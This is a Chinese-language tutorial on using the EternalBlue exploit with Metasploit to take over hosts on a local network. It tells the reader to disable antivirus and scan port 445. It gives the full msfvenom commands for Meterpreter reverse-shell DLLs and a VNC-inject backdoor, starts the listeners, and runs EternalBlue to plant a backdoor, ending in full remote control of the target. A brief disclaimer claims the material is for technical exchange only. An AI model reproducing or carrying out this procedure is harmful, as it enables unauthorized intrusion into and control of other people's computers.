在Win10系统下使用永恒之蓝和MSF框架对内网主机进行渗透测试

声明:本教程仅供技术交流,请勿用于商业及非法用途,如产生法律纠纷与本人无关!

Step-1

下载VNC-Viewer

下载并安装nmap

下载并安装metasploit-framework

下载并解压nsatools
密码: gnt7

注意:在安装部署MSF框架和nsatools前关闭或卸载所有杀软!

Step-2

在部署好所有工具之后,使用nmap对所在网段下的所有主机进行445端口扫描

选择一个目标主机进行详细扫描,这里我选择我的目标靶机

Step-3

确定目标主机的操作系统及版本信息后,有针对性的准备shellcode

新建cmd窗口,执行如下命令行以生成对应的dll注入文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=”这里填你们自己的主机IP” LPORT=4444 -f dll -o x86.dll

我自己的主机IP为10.100.231.23,故LHOST=10.100.231.23

若目标主机运行的是64位操作系统,则执行如下命令行

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=”你们自己的主机IP” LPORT=4444 -f dll -o x64.dll

将生成的dll文件拷贝到解压出来的nsatools/dll目录下,覆盖原有的文件

创建vncinject后门程序,为后面的远程桌面访问做准备

msfvenom -p windows/vncinject/reverse_tcp LHOST=”你们自己的主机IP” LPORT=5555 -f exe -o vnc.exe

Step-4

分别启动这两个会话监听,新建两个cmd窗口,分别执行如下命令行

msfconsole -q -r windows-reverse-tcp-4444.rc

msfconsole -q -r windows-vncinject-reverse-tcp-5555.rc

接下来启动nsatools,默认界面如图

选择永恒之蓝攻击模块,填入目标主机IP,端口默认445,系统WIN72K8R2,开始攻击

成功之后,你会看到输出信息当中会出现Backdoor installed!

Step-5

注入我们已经准备好的dll文件,填入目标主机IP,选择执行选项为RunDLL,系统位数根据实际选取,在这我选x86,文件路径对应也是选取x86.dll,其余选项保持不变,开始攻击

现在我们获得了目标主机的会话,接着再上传并执行vnc后门程序

此时右边的窗口也已经获取到了一个会话

我们使用VNC-Viewer来连接到映射到我们本地的这个5900端口

现在,我们已经可以通过vnc远程控制这台主机了